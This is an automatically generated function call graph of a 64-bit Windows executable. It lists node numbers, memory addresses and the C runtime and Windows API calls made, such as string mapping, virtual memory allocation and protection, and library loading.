7ff7b1eb9bf4 76029->76047 76030->76024 76059 7ff7b1eb9294 14 API calls 2 library calls 76030->76059 76034 7ff7b1ece554 76034->76030 76038 7ff7b1eb9bf4 __crtLCMapStringW 7 API calls 76034->76038 76035 7ff7b1ece5a6 76036 7ff7b1ece5c0 wcsftime 76035->76036 76037 7ff7b1eba290 wcsftime 15 API calls 76035->76037 76036->76030 76039 7ff7b1eb9bf4 __crtLCMapStringW 7 API calls 76036->76039 76037->76036 76038->76030 76040 7ff7b1ece641 76039->76040 76041 7ff7b1ece676 76040->76041 76055 7ff7b1ec3050 76040->76055 76041->76030 76058 7ff7b1eb9294 14 API calls 2 library calls 76041->76058 76048 7ff7b1eb9378 try_get_function 5 API calls 76047->76048 76049 7ff7b1eb9c32 76048->76049 76050 7ff7b1eb9c89 76049->76050 76051 7ff7b1eb9c37 LCMapStringEx 76049->76051 76060 7ff7b1eb9cd0 5 API calls 2 library calls 76050->76060 76052 7ff7b1eb9cbb 76051->76052 76052->76030 76052->76034 76052->76035 76054 7ff7b1eb9c93 LCMapStringW 76054->76052 76057 7ff7b1ec3073 WideCharToMultiByte 76055->76057 76058->76030 76059->76024 76060->76054 76062 7ff7b1e8d410 76061->76062 76078 7ff7b1eb67cc 76062->76078 76064 7ff7b1e8d41c 76084 7ff7b1e8d6f4 76064->76084 76067 7ff7b1e8d434 _RTC_Initialize 76076 7ff7b1e8d489 76067->76076 76089 7ff7b1e8d8a4 76067->76089 76069 7ff7b1e8d4b5 76069->75760 76070 7ff7b1e8d449 76092 7ff7b1eb5f54 76070->76092 76074 7ff7b1e8d45e 76075 7ff7b1eb6e98 26 API calls 76074->76075 76075->76076 76077 7ff7b1e8d4a5 76076->76077 76125 7ff7b1e8d9d4 7 API calls 2 library calls 76076->76125 76077->75760 76079 7ff7b1eb67dd 76078->76079 76080 7ff7b1eaaef8 _set_fmode 14 API calls 76079->76080 76083 7ff7b1eb67e5 76079->76083 76081 7ff7b1eb67f4 76080->76081 76126 7ff7b1eb8b14 23 API calls _invalid_parameter_noinfo 76081->76126 76083->76064 76085 7ff7b1e8d705 76084->76085 76088 7ff7b1e8d70a __scrt_acquire_startup_lock 76084->76088 76085->76088 76127 7ff7b1e8d9d4 7 API calls 2 library calls 76085->76127 76087 7ff7b1e8d77e 76088->76067 76128 7ff7b1e8d868 76089->76128 76091 7ff7b1e8d8ad 76091->76070 76093 7ff7b1eb5f74 76092->76093 76094 7ff7b1e8d455 76092->76094 76095 7ff7b1eb5f92 76093->76095 76096 7ff7b1eb5f7c 76093->76096 76094->76076 76124 7ff7b1e8d97c InitializeSListHead 76094->76124 76098 7ff7b1ec695c 37 API calls 76095->76098 76097 7ff7b1eaaef8 _set_fmode 14 API calls 76096->76097 76099 7ff7b1eb5f81 76097->76099 76100 7ff7b1eb5f97 76098->76100 76133 7ff7b1eb8b14 23 API calls _invalid_parameter_noinfo 76099->76133 76134 7ff7b1ec6114 30 API calls 3 library calls 76100->76134 76103 7ff7b1eb5fae 76135 7ff7b1eb5d34 26 API calls 76103->76135 76105 7ff7b1eb5feb 76136 7ff7b1eb5ef4 14 API calls 2 library calls 76105->76136 76107 7ff7b1eb6001 76108 7ff7b1eb6021 76107->76108 76109 7ff7b1eb6009 76107->76109 76138 7ff7b1eb5d34 26 API calls 76108->76138 76110 7ff7b1eaaef8 _set_fmode 14 API calls 76109->76110 76112 7ff7b1eb600e 76110->76112 76137 7ff7b1eb9294 14 API calls 2 library calls 76112->76137 76114 7ff7b1eb6043 76142 7ff7b1eb9294 14 API calls 2 library calls 76114->76142 76115 7ff7b1eb601c 76115->76094 76117 7ff7b1eb603d 76117->76114 76118 7ff7b1eb606f 76117->76118 76119 7ff7b1eb6088 76117->76119 76139 7ff7b1eb9294 14 API calls 2 library calls 76118->76139 76141 7ff7b1eb9294 14 API calls 2 library calls 76119->76141 76121 7ff7b1eb6078 76140 7ff7b1eb9294 14 API calls 2 library calls 76121->76140 76125->76069 76126->76083 76127->76087 76129 7ff7b1e8d882 76128->76129 76131 7ff7b1e8d87b 76128->76131 76132 7ff7b1eb85ec 26 API calls 76129->76132 76131->76091 76132->76131 76133->76094 76134->76103 76135->76105 76136->76107 76137->76115 76138->76117 76139->76121 76140->76115 76141->76114 76142->76094 76151 7ff7b1e8dbb8 SetUnhandledExceptionFilter 76143->76151 76153 7ff7b1e8e0f0 76152->76153 76153->75769 76153->76153 76154->75773 76156 7ff7b1de6b92 76155->76156 76168 7ff7b1df4a00 76156->76168 76159 7ff7b1de6c01 76171 7ff7b1dede20 76159->76171 76160 7ff7b1de6bee 76189 7ff7b1de5250 60 API calls _wcsupr_s 76160->76189 76167 7ff7b1de5116 76167->75780 76190 7ff7b1dea530 76168->76190 76170 7ff7b1de6be1 76170->76159 76170->76160 76172 7ff7b1de3037 _mbsncpy_s 94 API calls 76171->76172 76173 7ff7b1de6c2b 76172->76173 76174 7ff7b1de5300 76173->76174 76175 7ff7b1de536b 76174->76175 76176 7ff7b1de5314 wcsxfrm 76174->76176 76182 7ff7b1dea810 76175->76182 76176->76175 76540 7ff7b1dec230 15 API calls 4 library calls 76176->76540 76178 7ff7b1de5339 76541 7ff7b1de5250 60 API calls _wcsupr_s 76178->76541 76180 7ff7b1de535c 76542 7ff7b1deb4e0 76180->76542 76547 7ff7b1e0e2c0 76182->76547 76184 7ff7b1dea842 76185 7ff7b1de3037 _mbsncpy_s 94 API calls 76184->76185 76186 7ff7b1dea937 76184->76186 76185->76184 76187 7ff7b1deb260 6 API calls 76186->76187 76188 7ff7b1dea965 76187->76188 76188->76167 76189->76167 76199 7ff7b1e06950 76190->76199 76192 7ff7b1dea559 76194 7ff7b1dea55d _handle_error 76192->76194 76195 7ff7b1dea57c __scrt_get_show_window_mode 76192->76195 76203 7ff7b1e08930 76192->76203 76194->76170 76195->76194 76206 7ff7b1de3037 76195->76206 76200 7ff7b1e06963 LoadLibraryExA 76199->76200 76202 7ff7b1e06982 Concurrency::details::_UnrealizedChore::_CancelViaToken 76199->76202 76201 7ff7b1e06986 GetProcAddressForCaller 76200->76201 76200->76202 76201->76202 76202->76192 76221 7ff7b1e08bb0 GetLastError VirtualAlloc SetLastError 76203->76221 76205 7ff7b1e0894c __scrt_get_show_window_mode 76205->76195 76223 7ff7b1df4490 76206->76223 76237 7ff7b1deb3d0 76206->76237 76242 7ff7b1e064e4 76206->76242 76207 7ff7b1de2ddf 76207->76194 76213 7ff7b1deb260 76207->76213 76208 7ff7b1de2420 76208->76207 76247 7ff7b1e00f90 15 API calls 2 library calls 76208->76247 76214 7ff7b1deb28a 76213->76214 76517 7ff7b1e03ed0 76214->76517 76216 7ff7b1deb29e 76520 7ff7b1e027e0 76216->76520 76218 7ff7b1deb2a8 76219 7ff7b1deb39c 76218->76219 76524 7ff7b1e08ad0 76218->76524 76219->76194 76222 7ff7b1e08bf3 76221->76222 76222->76205 76248 7ff7b1e07170 76223->76248 76225 7ff7b1df456d 76226 7ff7b1df4585 76225->76226 76227 7ff7b1df4574 76225->76227 76277 7ff7b1e16200 91 API calls 4 library calls 76226->76277 76261 7ff7b1e14c00 76227->76261 76230 7ff7b1df44cf __ExceptionPtrDestroy 76230->76225 76275 7ff7b1df05a0 15 API calls 2 library calls 76230->76275 76231 7ff7b1df457e 76278 7ff7b1dfeae0 15 API calls 76231->76278 76233 7ff7b1df45b6 76233->76208 76235 7ff7b1df454c 76276 7ff7b1df0600 5 API calls _free_nolock 76235->76276 76373 7ff7b1df8450 76237->76373 76402 7ff7b1e4a950 76242->76402 76244 7ff7b1e06505 76428 7ff7b1e05590 76244->76428 76246 7ff7b1e0650f 76246->76208 76247->76208 76279 7ff7b1e077f0 76248->76279 76250 7ff7b1e0731f 76251 7ff7b1e072f8 76250->76251 76284 7ff7b1df05a0 15 API calls 2 library calls 76250->76284 76251->76230 76252 7ff7b1e077f0 _wcsupr_s 54 API calls 76254 7ff7b1e072d0 76252->76254 76254->76250 76254->76251 76254->76252 76257 7ff7b1e07315 76254->76257 76256 7ff7b1e077f0 _wcsupr_s 54 API calls 76256->76254 76283 7ff7b1e078c0 54 API calls _wcsupr_s 76257->76283 76258 7ff7b1e0737f _wcsupr_s 76285 7ff7b1df0600 5 API calls _free_nolock 76258->76285 76262 7ff7b1e14c45 76261->76262 76297 7ff7b1e15c90 76262->76297 76267 7ff7b1e14c62 76268 7ff7b1e14c90 76267->76268 76309 7ff7b1e151c0 76267->76309 76313 7ff7b1e15170 76267->76313 76317 7ff7b1e14840 76267->76317 76324 7ff7b1e14e10 15 API calls 2 library calls 76267->76324 76325 7ff7b1dead60 15 API calls _free_nolock 76267->76325 76269 7ff7b1e14dd5 76268->76269 76326 7ff7b1e14e10 15 API calls 2 library calls 76268->76326 76269->76231 76275->76235 76276->76225 76277->76231 76278->76233 76280 7ff7b1e07834 76279->76280 76281 7ff7b1e07250 76279->76281 76286 7ff7b1e07700 76280->76286 76281->76254 76281->76256 76283->76250 76284->76258 76285->76251 76291 7ff7b1df4600 76286->76291 76287 7ff7b1e0773d 76287->76281 76292 7ff7b1eab000 23 API calls 76291->76292 76293 7ff7b1df462a 76292->76293 76294 7ff7b1eab380 _fread_nolock 39 API calls 76293->76294 76295 7ff7b1df462e 76293->76295 76294->76295 76295->76287 76296 7ff7b1df0690 15 API calls 2 library calls 76295->76296 76296->76287 76298 7ff7b1e151c0 54 API calls 76297->76298 76300 7ff7b1e15ca8 76298->76300 76299 7ff7b1e15d8b 76301 7ff7b1e15dcf 76299->76301 76302 7ff7b1e15d96 _free_nolock 76299->76302 76300->76299 76307 7ff7b1e14c4f 76300->76307 76327 7ff7b1e2e570 15 API calls 2 library calls 76300->76327 76304 7ff7b1e15170 54 API calls 76301->76304 76328 7ff7b1dfb7a0 76302->76328 76306 7ff7b1e15deb 76304->76306 76308 7ff7b1dfb7a0 type_info::_name_internal_method 15 API calls 76306->76308 76307->76267 76323 7ff7b1e14e10 15 API calls 2 library calls 76307->76323 76308->76307 76310 7ff7b1e151e8 76309->76310 76311 7ff7b1e151f9 76309->76311 76344 7ff7b1e14ed0 76310->76344 76311->76267 76314 7ff7b1e15198 76313->76314 76315 7ff7b1e151ac 76313->76315 76316 7ff7b1e14ed0 54 API calls 76314->76316 76315->76267 76316->76315 76319 7ff7b1e1486e 76317->76319 76357 7ff7b1df8da0 76319->76357 76320 7ff7b1e149ac 76362 7ff7b1e15790 15 API calls type_info::_name_internal_method 76320->76362 76322 7ff7b1e14ad7 76322->76267 76323->76267 76324->76267 76325->76267 76326->76269 76327->76300 76329 7ff7b1dfb9a5 76328->76329 76331 7ff7b1dfb7d8 __ExceptionPtrDestroy type_info::_name_internal_method 76328->76331 76336 7ff7b1dfb8f6 76329->76336 76343 7ff7b1df0950 15 API calls strrchr 76329->76343 76332 7ff7b1dfb980 76331->76332 76333 7ff7b1dfb966 76331->76333 76331->76336 76337 7ff7b1dfc060 76332->76337 76342 7ff7b1dfbe30 15 API calls type_info::_name_internal_method 76333->76342 76336->76307 76338 7ff7b1df8d00 _free_nolock 15 API calls 76337->76338 76340 7ff7b1dfc09a Concurrency::details::_UnrealizedChore::_CancelViaToken memcpy_s 76338->76340 76339 7ff7b1dfc285 76339->76336 76340->76339 76341 7ff7b1dfb310 type_info::_name_internal_method 15 API calls 76340->76341 76341->76339 76342->76336 76343->76336 76345 7ff7b1e14eec 76344->76345 76348 7ff7b1e14f06 memcpy_s 76345->76348 76354 7ff7b1e14e10 15 API calls 2 library calls 76345->76354 76347 7ff7b1e15023 76349 7ff7b1e15039 76347->76349 76355 7ff7b1e14e10 15 API calls 2 library calls 76347->76355 76348->76347 76348->76349 76352 7ff7b1e14790 15 API calls 76348->76352 76353 7ff7b1df4600 39 API calls 76348->76353 76356 7ff7b1df0690 15 API calls 2 library calls 76348->76356 76349->76311 76352->76348 76353->76348 76354->76348 76355->76349 76356->76348 76363 7ff7b1e08b40 76357->76363 76359 7ff7b1df8ded 76359->76320 76362->76322 76364 7ff7b1e08b60 76363->76364 76365 7ff7b1e08b73 76363->76365 76368 7ff7b1e0ca40 GetLastError VirtualQuery VirtualFree SetLastError 76364->76368 76366 7ff7b1e08b7b 76365->76366 76367 7ff7b1e08b8e 76365->76367 76370 7ff7b1e0c230 6 API calls 76366->76370 76369 7ff7b1df8dd6 76367->76369 76371 7ff7b1e0d9e0 10 API calls 76367->76371 76368->76369 76369->76359 76372 7ff7b1df0690 15 API calls 2 library calls 76369->76372 76370->76369 76371->76369 76372->76359 76374 7ff7b1deb3ed 76373->76374 76375 7ff7b1df8484 76373->76375 76377 7ff7b1df8420 76374->76377 76375->76374 76381 7ff7b1dfa690 76375->76381 76378 7ff7b1df8429 76377->76378 76379 7ff7b1deb3f7 76378->76379 76392 7ff7b1dfa850 76378->76392 76379->76208 76382 7ff7b1dfa707 76381->76382 76387 7ff7b1de2f8a 76382->76387 76390 7ff7b1de2420 76387->76390 76389 7ff7b1de34d2 76390->76389 76391 7ff7b1e00f90 15 API calls 2 library calls 76390->76391 76391->76390 76393 7ff7b1dfa888 76392->76393 76394 7ff7b1dfa9a3 wcsxfrm 76393->76394 76395 7ff7b1dfa8bd 76393->76395 76396 7ff7b1dfa99e 76394->76396 76398 7ff7b1dfa690 15 API calls 76394->76398 76401 7ff7b1dfd720 15 API calls 3 library calls 76395->76401 76396->76378 76398->76396 76399 7ff7b1dfa94c 76399->76396 76400 7ff7b1dfa690 15 API calls 76399->76400 76400->76396 76401->76399 76403 7ff7b1e4a9b7 76402->76403 76438 7ff7b1e4a900 76403->76438 76405 7ff7b1e4aa15 76442 7ff7b1e037c0 76405->76442 76407 7ff7b1e4aa87 76445 7ff7b1e3aa20 76407->76445 76413 7ff7b1e4f750 5 API calls 76422 7ff7b1e4abb7 76413->76422 76414 7ff7b1e4b460 18 API calls 76414->76422 76416 7ff7b1e4f660 18 API calls 76416->76422 76421 7ff7b1e4aebf memcpy_s 76468 7ff7b1e4f750 76421->76468 76422->76413 76422->76414 76422->76416 76422->76421 76424 7ff7b1e037c0 15 API calls 76422->76424 76454 7ff7b1e5e3a0 76422->76454 76458 7ff7b1e4e150 76422->76458 76464 7ff7b1e521b0 76422->76464 76472 7ff7b1e5e040 18 API calls 76422->76472 76473 7ff7b1e5cc10 RtlCaptureContext RtlLookupFunctionEntry RtlRestoreContext RtlVirtualUnwind RaiseException 76422->76473 76474 7ff7b1e504a0 18 API calls 76422->76474 76475 7ff7b1e5d4f0 18 API calls 2 library calls 76422->76475 76424->76422 76427 7ff7b1e4aff8 _handle_error 76427->76244 76429 7ff7b1e05611 76428->76429 76512 7ff7b1e3aa90 76429->76512 76431 7ff7b1e0597e 76431->76246 76432 7ff7b1e0583b 76432->76431 76515 7ff7b1e5ee70 15 API calls 2 library calls 76432->76515 76434 7ff7b1e0589d 76434->76431 76435 7ff7b1dfb7a0 type_info::_name_internal_method 15 API calls 76434->76435 76436 7ff7b1e058e9 Concurrency::details::_UnrealizedChore::_CancelViaToken 76435->76436 76516 7ff7b1e5f070 73 API calls _wcsupr_s 76436->76516 76439 7ff7b1e4a926 76438->76439 76440 7ff7b1e4a930 76438->76440 76477 7ff7b1e65d90 15 API calls _free_nolock 76439->76477 76440->76405 76478 7ff7b1df8d00 76442->76478 76444 7ff7b1e0383b memcpy_s 76444->76407 76446 7ff7b1e3aa49 76445->76446 76447 7ff7b1e3aa3d 76445->76447 76487 7ff7b1e3aee0 76446->76487 76484 7ff7b1e3b0e0 76447->76484 76450 7ff7b1e3aa47 76451 7ff7b1e5c660 76450->76451 76503 7ff7b1e52a10 18 API calls Concurrency::details::_UnrealizedChore::_CancelViaToken 76451->76503 76453 7ff7b1e5c685 76453->76422 76455 7ff7b1e5e3e6 76454->76455 76456 7ff7b1e5e5dd 76455->76456 76504 7ff7b1e036b0 5 API calls 2 library calls 76455->76504 76456->76422 76460 7ff7b1e4e16f 76458->76460 76459 7ff7b1e4e273 76459->76422 76461 7ff7b1e4e1e6 76460->76461 76505 7ff7b1e4b460 76460->76505 76461->76459 76463 7ff7b1e4b460 18 API calls 76461->76463 76463->76461 76466 7ff7b1e521c8 type_info::_name_internal_method 76464->76466 76465 7ff7b1e52291 76465->76422 76466->76465 76510 7ff7b1e4e540 15 API calls Concurrency::details::_UnrealizedChore::_CancelViaToken 76466->76510 76469 7ff7b1e4af63 76468->76469 76470 7ff7b1e4f775 76468->76470 76469->76427 76476 7ff7b1e036b0 5 API calls 2 library calls 76469->76476 76470->76469 76511 7ff7b1e036b0 5 API calls 2 library calls 76470->76511 76472->76422 76473->76422 76474->76422 76475->76422 76476->76427 76477->76440 76480 7ff7b1df8d45 76478->76480 76482 7ff7b1e08b40 10 API calls 76478->76482 76479 7ff7b1df8d64 76479->76444 76480->76479 76483 7ff7b1df0690 15 API calls 2 library calls 76480->76483 76482->76480 76483->76479 76493 7ff7b1e3af50 76484->76493 76488 7ff7b1e3aefe 76487->76488 76491 7ff7b1e3af2e 76487->76491 76500 7ff7b1e3ade0 VirtualProtect 76488->76500 76491->76450 76498 7ff7b1e3af88 Concurrency::details::_UnrealizedChore::_CancelViaToken 76493->76498 76494 7ff7b1e3b0c3 76495 7ff7b1e036b0 Concurrency::details::_UnrealizedChore::_CancelViaToken 5 API calls 76494->76495 76496 7ff7b1e3b03b 76495->76496 76496->76450 76497 7ff7b1e3ad30 6 API calls 76497->76498 76498->76494 76498->76496 76498->76497 76499 7ff7b1e3ada0 VirtualFree 76498->76499 76499->76498 76501 7ff7b1e3ae11 76500->76501 76501->76491 76502 7ff7b1e3ae40 15 API calls 2 library calls 76501->76502 76502->76491 76503->76453 76504->76456 76506 7ff7b1e4b48d 76505->76506 76507 7ff7b1e4b483 76505->76507 76506->76460 76509 7ff7b1e4b410 18 API calls 76507->76509 76509->76506 76510->76466 76511->76469 76513 7ff7b1e3aee0 16 API calls 76512->76513 76514 7ff7b1e3aabe 76513->76514 76514->76432 76515->76434 76516->76431 76528 7ff7b1e3a990 76517->76528 76519 7ff7b1e03ef3 76519->76216 76521 7ff7b1e02802 76520->76521 76523 7ff7b1e0280c 76520->76523 76533 7ff7b1e37300 VirtualFree 76521->76533 76523->76218 76525 7ff7b1e08af3 76524->76525 76526 7ff7b1e08b35 76525->76526 76534 7ff7b1e08c90 GetLastError 76525->76534 76526->76219 76529 7ff7b1e3a9ca 76528->76529 76530 7ff7b1e3aa0d 76529->76530 76532 7ff7b1e3ada0 VirtualFree 76529->76532 76530->76519 76532->76529 76533->76523 76538 7ff7b1e08cb2 76534->76538 76535 7ff7b1e08cbe VirtualQuery 76537 7ff7b1e08cd9 76535->76537 76535->76538 76536 7ff7b1e08d65 SetLastError 76536->76537 76537->76525 76538->76535 76538->76536 76538->76537 76539 7ff7b1e08d18 VirtualFree 76538->76539 76539->76537 76539->76538 76540->76178 76541->76180 76543 7ff7b1deb563 76542->76543 76544 7ff7b1deb4f8 76542->76544 76543->76175 76544->76543 76546 7ff7b1deaca0 15 API calls 2 library calls 76544->76546 76546->76543 76548 7ff7b1e0e33e 76547->76548 76549 7ff7b1e0e2f6 76547->76549 76548->76184 76553 7ff7b1e0e6e0 WaitForSingleObject DeleteCriticalSection 76549->76553 76551 7ff7b1e0e300 76554 7ff7b1e03bb0 74 API calls 3 library calls 76551->76554 76553->76551 76554->76548 76555 7ff7b1de2282 76556 7ff7b1de229c 76555->76556 76556->76555 76558 7ff7b1dfcf10 76556->76558 76559 7ff7b1dfcf2e wcsxfrm 76558->76559 76562 7ff7b1dfcaf0 76559->76562 76561 7ff7b1dfcf68 76561->76556 76563 7ff7b1dfcb4b 76562->76563 76575 7ff7b1dfcbba wcsxfrm 76562->76575 76564 7ff7b1dfcb6a 76563->76564 76579 7ff7b1df0950 15 API calls strrchr 76563->76579 76566 7ff7b1dfcc29 76564->76566 76569 7ff7b1dfcb89 76564->76569 76568 7ff7b1df8d00 _free_nolock 15 API calls 76566->76568 76568->76575 76571 7ff7b1df8d00 _free_nolock 15 API calls 76569->76571 76570 7ff7b1dfcec5 wcsxfrm 76570->76561 76571->76575 76572 7ff7b1dfcde6 76574 7ff7b1df8d00 _free_nolock 15 API calls 76572->76574 76578 7ff7b1dfce28 wcsxfrm 76572->76578 76574->76578 76577 7ff7b1dfccde wcsxfrm 76575->76577 76580 7ff7b1dfde50 15 API calls 2 library calls 76575->76580 76577->76572 76577->76578 76581 7ff7b1dfd5c0 15 API calls wcsxfrm 76577->76581 76578->76570 76582 7ff7b1dfd720 15 API calls 3 library calls 76578->76582 76579->76564 76580->76577 76581->76577 76582->76578 76583 7ff7b1de1a21 76586 7ff7b1dffd90 76583->76586 76585 7ff7b1de1a47 76585->76585 76592 7ff7b1dffdb8 76586->76592 76587 7ff7b1dffeb0 wcsxfrm 76591 7ff7b1dfff71 strrchr _mbsncpy_s 76587->76591 76613 7ff7b1df0a70 15 API calls 2 library calls 76587->76613 76591->76585 76592->76587 76592->76591 76593 7ff7b1e002a6 76592->76593 76606 7ff7b1dff2a0 76592->76606 76610 7ff7b1dff2f0 76592->76610 76614 7ff7b1df0950 15 API calls strrchr 76592->76614 76594 7ff7b1e002b7 76593->76594 76597 7ff7b1e002fd 76593->76597 76615 7ff7b1e1e9c0 15 API calls 76594->76615 76598 7ff7b1e0037d 76597->76598 76603 7ff7b1e00333 76597->76603 76600 7ff7b1e00396 76598->76600 76601 7ff7b1e00383 76598->76601 76599 7ff7b1e002f8 76599->76585 76618 7ff7b1e32fe0 15 API calls type_info::_name_internal_method 76600->76618 76617 7ff7b1e11a40 15 API calls 2 library calls 76601->76617 76616 7ff7b1e1e9c0 15 API calls 76603->76616 76607 7ff7b1dff2c7 76606->76607 76609 7ff7b1dff2d5 76606->76609 76619 7ff7b1e1e3f0 15 API calls 3 library calls 76607->76619 76609->76592 76611 7ff7b1dfb7a0 type_info::_name_internal_method 15 API calls 76610->76611 76612 7ff7b1dff32a 76611->76612 76612->76592 76613->76591 76614->76592 76615->76599 76616->76599 76617->76599 76618->76599 76619->76609 76620 7ff7b1de4a01 76621 7ff7b1de4a0c 76620->76621 76622 7ff7b1de4a30 76620->76622 76621->76622 76625 7ff7b1df2dc0 76621->76625 76639 7ff7b1e040a0 96 API calls _set_fmode 76622->76639 76626 7ff7b1eaaef8 _set_fmode 14 API calls 76625->76626 76627 7ff7b1df2dd3 GetLastError 76626->76627 76628 7ff7b1df2e77 76627->76628 76630 7ff7b1df2ee6 76628->76630 76640 7ff7b1e03fc0 76628->76640 76635 7ff7b1df2f35 wcsxfrm 76630->76635 76644 7ff7b1df3a80 19 API calls _handle_error 76630->76644 76632 7ff7b1df3074 76633 7ff7b1eaaef8 _set_fmode 14 API calls 76632->76633 76634 7ff7b1df3079 SetLastError 76633->76634 76634->76622 76636 7ff7b1df3005 76635->76636 76645 7ff7b1df3a80 19 API calls _handle_error 76635->76645 76636->76632 76646 7ff7b1df3a80 19 API calls _handle_error 76636->76646 76639->76622 76642 7ff7b1e04020 76640->76642 76641 7ff7b1de3037 _mbsncpy_s 94 API calls 76641->76642 76642->76641 76643 7ff7b1e04089 76642->76643 76643->76630 76644->76635 76645->76636 76646->76632 76647 7ff7b1de21fc 76648 7ff7b1de221f 76647->76648 76653 7ff7b1dff8b0 76648->76653 76650 7ff7b1de3283 76652 7ff7b1de32a9 76650->76652 76669 7ff7b1dffbf0 38 API calls 2 library calls 76650->76669 76654 7ff7b1dff8d7 76653->76654 76655 7ff7b1dffb0b wcsxfrm 76654->76655 76658 7ff7b1dffb09 strrchr 76654->76658 76661 7ff7b1dff8fa wcsxfrm 76654->76661 76657 7ff7b1dffb36 76655->76657 76655->76658 76678 7ff7b1df0a70 15 API calls 2 library calls 76657->76678 76660 7ff7b1dff941 wcsxfrm 76658->76660 76679 7ff7b1df0950 15 API calls strrchr 76658->76679 76660->76650 76661->76658 76661->76660 76662 7ff7b1dffa0d wcsxfrm 76661->76662 76662->76660 76663 7ff7b1dffa6d 76662->76663 76666 7ff7b1dffa81 76662->76666 76676 7ff7b1df0950 15 API calls strrchr 76663->76676 76665 7ff7b1dffa7f 76670 7ff7b1dfd290 76665->76670 76666->76665 76677 7ff7b1df0950 15 API calls strrchr 76666->76677 76669->76650 76671 7ff7b1dfd2b2 wcsxfrm 76670->76671 76675 7ff7b1dfd321 wcsxfrm 76671->76675 76680 7ff7b1dfe560 76671->76680 76673 7ff7b1dfd30d 76684 7ff7b1dfd720 15 API calls 3 library calls 76673->76684 76675->76660 76676->76665 76677->76665 76678->76660 76679->76660 76681 7ff7b1dfe592 wcsxfrm 76680->76681 76682 7ff7b1dfcaf0 wcsxfrm 15 API calls 76681->76682 76683 7ff7b1dfe691 _handle_error 76682->76683 76683->76673 76684->76675 76685 7ff7b1e27930 76690 7ff7b1defb80 15 API calls 5 library calls 76685->76690 76687 7ff7b1e2794e 76691 7ff7b1eb55c4 76687->76691 76689 7ff7b1e2795d 76690->76687 76719 7ff7b1e91ab8 76691->76719 76694 7ff7b1eb56ea 76725 7ff7b1eb8b34 9 API calls _isindst 76694->76725 76695 7ff7b1eb5608 76696 7ff7b1eb560d 76695->76696 76697 7ff7b1eb562b 76695->76697 76699 7ff7b1eb5621 76696->76699 76722 7ff7b1ec0d88 31 API calls 3 library calls 76696->76722 76697->76699 76703 7ff7b1eaaef8 _set_fmode 14 API calls 76697->76703 76724 7ff7b1eb9294 14 API calls 2 library calls 76699->76724 76705 7ff7b1eb5650 76703->76705 76704 7ff7b1eb5699 _handle_error 76704->76689 76706 7ff7b1eaaef8 _set_fmode 14 API calls 76705->76706 76707 7ff7b1eb5657 76706->76707 76708 7ff7b1eb5673 76707->76708 76709 7ff7b1eb567c 76707->76709 76710 7ff7b1eaaef8 _set_fmode 14 API calls 76708->76710 76711 7ff7b1eaaef8 _set_fmode 14 API calls 76709->76711 76710->76699 76712 7ff7b1eb5681 76711->76712 76713 7ff7b1eb569e 76712->76713 76715 7ff7b1eaaef8 _set_fmode 14 API calls 76712->76715 76714 7ff7b1eaaef8 _set_fmode 14 API calls 76713->76714 76714->76699 76716 7ff7b1eb568b 76715->76716 76716->76713 76717 7ff7b1eb5690 76716->76717 76723 7ff7b1eb9294 14 API calls 2 library calls 76717->76723 76726 7ff7b1e91748 76719->76726 76721 7ff7b1e91ad2 76721->76694 76721->76695 76722->76699 76723->76704 76724->76704 76758 7ff7b1eb91ac EnterCriticalSection 76726->76758 76728 7ff7b1e91774 76729 7ff7b1e9177c 76728->76729 76732 7ff7b1e9179f 76728->76732 76730 7ff7b1eaaef8 _set_fmode 14 API calls 76729->76730 76731 7ff7b1e91781 76730->76731 76733 7ff7b1eb8b14 _invalid_parameter_noinfo 23 API calls 76731->76733 76734 7ff7b1e9189c 41 API calls 76732->76734 76735 7ff7b1e9178d 76733->76735 76737 7ff7b1e917a7 __CxxCallCatchBlock 76734->76737 76736 7ff7b1eb9200 _isindst LeaveCriticalSection 76735->76736 76738 7ff7b1e91807 76736->76738 76737->76735 76739 7ff7b1e917e3 76737->76739 76740 7ff7b1e917d3 76737->76740 76738->76721 76742 7ff7b1eb8840 __std_exception_copy 23 API calls 76739->76742 76741 7ff7b1eaaef8 _set_fmode 14 API calls 76740->76741 76741->76735 76743 7ff7b1e917f1 76742->76743 76743->76735 76744 7ff7b1e91824 76743->76744 76745 7ff7b1eb8b34 _isindst 9 API calls 76744->76745 76746 7ff7b1e91838 _vswprintf 76745->76746 76747 7ff7b1e9184a 76746->76747 76751 7ff7b1e91874 76746->76751 76748 7ff7b1eaaef8 _set_fmode 14 API calls 76747->76748 76749 7ff7b1e9184f 76748->76749 76750 7ff7b1eb8b14 _invalid_parameter_noinfo 23 API calls 76749->76750 76752 7ff7b1e9185a 76750->76752 76753 7ff7b1eb91ac _isindst EnterCriticalSection 76751->76753 76752->76721 76754 7ff7b1e9187e 76753->76754 76755 7ff7b1e9189c 41 API calls 76754->76755 76756 7ff7b1e91887 76755->76756 76757 7ff7b1eb9200 _isindst LeaveCriticalSection 76756->76757 76757->76752 76759 7ff7b1e056dc 76770 7ff7b1e4b100 76759->76770 76762 7ff7b1e3aa90 16 API calls 76764 7ff7b1e0583b 76762->76764 76763 7ff7b1e0597e 76764->76763 76775 7ff7b1e5ee70 15 API calls 2 library calls 76764->76775 76766 7ff7b1e0589d 76766->76763 76767 7ff7b1dfb7a0 type_info::_name_internal_method 15 API calls 76766->76767 76768 7ff7b1e058e9 Concurrency::details::_UnrealizedChore::_CancelViaToken 76767->76768 76776 7ff7b1e5f070 73 API calls _wcsupr_s 76768->76776 76777 7ff7b1e3ab10 76770->76777 76772 7ff7b1e4b138 76773 7ff7b1e3ab10 16 API calls 76772->76773 76774 7ff7b1e05725 76773->76774 76774->76762 76775->76766 76776->76763 76778 7ff7b1e3ab2a 76777->76778 76779 7ff7b1e3ab81 76777->76779 76780 7ff7b1e3ab4e 76778->76780 76781 7ff7b1e3ab3d 76778->76781 76782 7ff7b1e3abd2 76779->76782 76785 7ff7b1e3abbc 76779->76785 76784 7ff7b1e3ade0 VirtualProtect 76780->76784 76783 7ff7b1e3aee0 16 API calls 76781->76783 76788 7ff7b1e3ade0 VirtualProtect 76782->76788 76790 7ff7b1e3ab4c 76783->76790 76786 7ff7b1e3ab67 76784->76786 76787 7ff7b1e3aee0 16 API calls 76785->76787 76786->76790 76793 7ff7b1e3ae40 15 API calls 2 library calls 76786->76793 76787->76790 76791 7ff7b1e3ac1f 76788->76791 76790->76772 76791->76790 76794 7ff7b1e3ae40 15 API calls 2 library calls 76791->76794 76793->76790 76794->76790 76795 7ff7b1de2c6e 76796 7ff7b1de2ca4 76795->76796 76797 7ff7b1de2e9e 76795->76797 76817 7ff7b1e2f900 76796->76817 76829 7ff7b1e30300 76796->76829 76833 7ff7b1e31750 76796->76833 76838 7ff7b1de6950 